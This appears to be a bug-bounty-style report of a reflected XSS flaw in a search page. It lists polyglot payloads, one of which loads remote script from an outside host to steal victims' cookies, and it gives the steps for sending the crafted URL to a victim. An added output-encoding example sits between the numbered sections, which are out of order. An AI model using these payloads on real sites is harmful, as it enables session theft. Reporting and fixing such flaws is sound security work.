XSS INFECTED Search Bar
XSS INFECTED
This XSS is fairly dangerous because it works on the search page.
Steps:
1. The attacker enters this script in the search bar:
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+$.getScript("//nandoxp1.xss.ht")//'>
or
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+window.location.replace("http://www.w3schools.com")//'>
or
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert("xss")//'>
2. The attacker gives the resulting URL to the victim.
3. When the victim opens that URL, the attacker will get cookie information, etc.
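A defensive counterpart to the steps above, as an added example that is not code from the original post or from the affected site: it encodes the search term for each place a search page typically reflects it, then checks that the `alert` variant from step 1 stays inert. The reflection points (title, input value, body, inline script) and all function names are assumptions.

```javascript
// Added example: context-aware output encoding for a reflected search term.
// Assumption: the page echoes the term into <title>, an <input value>,
// the body text and an inline <script> variable.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// HTML text and quoted-attribute contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Inline <script> data context: JSON.stringify alone leaves "</script>" intact,
// so also escape <, >, & and the line separators U+2028/U+2029.
function escapeJsData(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function renderSearchPage(term) {
  const h = escapeHtml(term);
  return [
    '<!doctype html>',
    `<title>Search: ${h}</title>`,
    `<form><input name="q" value="${h}"></form>`,
    `<p>Results for <b>${h}</b></p>`,
    `<script>var lastQuery = ${escapeJsData(term)};</script>`,
  ].join('\n');
}

// Sample input: the alert variant of the polyglot from step 1.
const PAYLOAD = `javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert("xss")//'>`;

// True when the term cannot close any enclosing element or open a new tag.
function staysInert(term) {
  const html = renderSearchPage(term);
  const count = (needle) => html.split(needle).length - 1;
  return !html.includes('<svg') &&
    count('</title>') === 1 &&
    count('</script>') === 1;
}
```

`escapeHtml` does not cover URL contexts such as `href` or `src`; there the scheme has to be allowlisted as well, which is what the `javascript:` prefix of the payload targets.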
2. Proof of concept (POC):
Xss proof
3. Reward:
1000000 By Ipoint
